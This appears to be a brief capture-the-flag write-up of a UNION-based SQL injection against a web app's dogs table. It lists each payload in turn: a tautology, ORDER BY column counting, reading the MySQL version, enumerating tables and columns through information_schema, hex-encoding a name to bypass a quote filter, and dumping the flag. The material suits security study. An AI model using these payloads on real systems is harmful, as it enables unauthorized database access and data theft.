1 OR 1=1lists all the entries of the dogs table, not really helpful
To determine number of columns in the result set:
1 ORDER BY 1
1 ORDER BY 2
1 ORDER BY 3
1 ORDER BY 4
1 ORDER BY 5At 5, it gives no results; so there are 4 columns
Querying for version:
1 UNION SELECT NULL, @@version, NULL, NULLThe result is 5.5.58-0ubuntu0.14.04.1, which is a MySQL version
Querying for table names:
1 UNION SELECT NULL, table_name, NULL, NULL FROM information_schema.tablesA promising table name: w0w_y0u_f0und_m3
Quering for its columns:
1 UNION SELECT NULL, column_name, NULL, NULL FROM information_schema.columns WHERE table_name='w0w_y0u_f0und_m3'But this gives no results, maybe because quotes are disallowed. So, using hex:
1 UNION SELECT NULL, column_name, NULL, NULL FROM information_schema.columns WHERE table_name=0x7730775F7930755F6630756E645F6D33A promising column name: f0und_m3
Querying for the rows:
1 UNION SELECT NULL, f0und_m3, NULL, NULL FROM w0w_y0u_f0und_m3Voila!